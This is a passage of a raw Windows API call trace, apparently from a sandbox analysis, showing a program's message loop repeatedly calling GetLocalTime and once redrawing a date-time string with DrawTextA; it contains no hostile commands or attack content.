DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.030] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x303)) [0111.030] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x303)) [0111.030] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.057] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.057] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.057] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x31e)) [0111.057] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x31e)) [0111.057] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.079] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.079] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.079] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x334)) [0111.079] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x334)) [0111.079] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.090] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.090] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.090] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x33f)) [0111.090] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x33f)) [0111.090] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.111] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.111] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.111] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x354)) [0111.111] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x354)) [0111.111] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.122] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.122] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.122] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x35f)) [0111.123] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x360)) [0111.123] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.137] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.137] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.137] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x36f)) [0111.138] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x36f)) [0111.138] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.152] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.152] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.152] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x37d)) [0111.153] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x37e)) [0111.153] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.173] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.173] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.173] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x392)) [0111.173] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x392)) [0111.173] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.183] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.183] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.183] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x39c)) [0111.183] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x39c)) [0111.183] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.206] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.206] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.206] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x3b3)) [0111.206] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x3b3)) [0111.206] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.213] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.213] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.214] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x3bb)) [0111.214] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x3bb)) [0111.214] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.249] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.249] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.249] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x3de)) [0111.249] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x3de)) [0111.249] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.262] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.262] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.262] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3)) [0111.262] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3)) [0111.262] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0111.262] GetDC (hWnd=0x0) returned 0xa0100d0 [0111.263] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0111.263] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0111.263] GetSysColor (nIndex=8) returned 0x0 [0111.263] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0111.263] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0111.263] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0111.263] UnrealizeObject (h=0x2d10099f) returned 1 [0111.263] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0111.263] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0111.263] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0111.263] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:41 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:41 PM", lprc=0x19f5bd) returned 13 [0111.265] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0111.265] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0111.265] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0111.265] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0111.265] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0111.265] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.285] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.285] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.285] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1a)) [0111.285] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1a)) [0111.285] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.292] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.292] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.292] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x21)) [0111.292] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x21)) [0111.292] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.311] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.311] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.311] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x34)) [0111.311] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x34)) [0111.311] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.323] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.323] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.323] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x40)) [0111.323] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x40)) [0111.324] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.345] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.345] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.345] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x56)) [0111.345] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x56)) [0111.345] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.355] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.355] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.355] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x60)) [0111.355] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x60)) [0111.355] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.371] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.371] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.371] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x70)) [0111.371] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x70)) [0111.371] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.401] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.401] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.401] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x8e)) [0111.401] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x8e)) [0111.402] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.427] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.427] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.427] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xa8)) [0111.428] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xa9)) [0111.428] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.438] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.438] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.438] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xb3)) [0111.438] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xb3)) [0111.438] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.449] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.449] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.449] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xbe)) [0111.449] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xbe)) [0111.449] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.469] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.469] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.469] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xd2)) [0111.469] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xd2)) [0111.469] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.480] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.480] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.480] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xdd)) [0111.480] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xdd)) [0111.480] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.498] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.498] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.498] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xef)) [0111.498] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0xef)) [0111.498] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.524] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.524] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.524] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x109)) [0111.524] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x109)) [0111.524] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.536] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.536] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.536] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x115)) [0111.536] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x115)) [0111.536] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.546] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.546] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.546] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x11f)) [0111.546] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x11f)) [0111.546] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.557] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.557] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.557] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x12a)) [0111.557] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x12a)) [0111.557] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.585] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.585] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.585] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x146)) [0111.585] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x146)) [0111.585] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.594] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.594] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.594] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x14f)) [0111.594] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x14f)) [0111.594] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.605] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.605] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.605] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x15a)) [0111.605] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x15a)) [0111.605] GetMessageA 